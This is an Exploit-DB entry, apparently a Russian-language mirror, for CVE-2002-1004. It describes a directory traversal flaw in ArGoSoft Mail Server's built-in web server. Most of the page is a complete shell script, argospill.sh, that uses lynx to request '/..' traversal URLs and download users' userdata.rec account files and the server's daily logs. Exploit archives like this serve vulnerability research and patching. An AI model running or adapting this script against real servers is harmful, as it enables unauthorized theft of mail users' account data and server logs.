- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 21591
- Проверка EDB
-
- Пройдено
- Автор
- TEAM N.FINITY
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2002-1004
- Дата публикации
- 2002-07-06
Код:
source: https://www.securityfocus.com/bid/5144/info
ArGoSoft Mail Server is an STMP, POP3 and Finger server for Microsoft Windows environments. ArGoSoft has a built in web server to enable remote access to mail.
A directory traversal issue has been reported in the web server, which could allow remote users access to all files residing on the host.
This is accomplished by submitting a specially crafted request containing '/..' character sequences to a specific directory.
This issue is reported to exist in ArGoSoft Mail Server 1.8.1.5, earlier versions may also be affected by this issue.
#!/bin/sh
#
# released on 06/07/2002 by team n.finity <[email protected]>
# find us at http://nfinity.yoll.net/
#
# argospill.sh
HOST=$1
USER=$2
DOMAIN=$3
startpro()
{
echo -e "\nSpilling user $USER @ $DOMAIN, host $HOST (Pro)\n"
URL=/_users/$DOMAIN/$USER/_tempatt/../userdata.rec
/usr/bin/lynx -dump http://$HOST$URL
}
startplus()
{
echo -e "\nSpilling user $USER, host $HOST (Plus)\n"
URL=/$USER/_tempatt/../userdata.rec
/usr/bin/lynx -dump http://$HOST$URL
}
startboth()
{
echo -e "\nSpilling host $HOST (Plus / Pro)\n"
URL=/images/../_logs/`date -d '-1 day' +%Y-%m-%d`.txt
/usr/bin/lynx -dump http://$HOST$URL
}
usage()
{
echo -e "\nUsage:\n"
echo "Both - $0 <host>"
echo "Pro - $0 <host> <user> <domain>"
echo "Plus - $0 <host> <user>"
echo -e "\nExample:\n"
echo "Both, images dir - $0 www.test.com"
echo "Plus, no dom req - $0 www.test.com me"
echo "Pro, default dom - $0 www.test.com me _nodomain"
echo "Pro, virtual dom - $0 www.test.com me test.com"
}
echo "Argospill 1.0 by Team N.finity"
if [ -n "$HOST" ]; then
if [ -n "$USER" ]; then
if [ -n "$DOMAIN" ]; then
startpro
else
startplus
fi
else
startboth
fi
else
usage
fi- Источник
- www.exploit-db.com
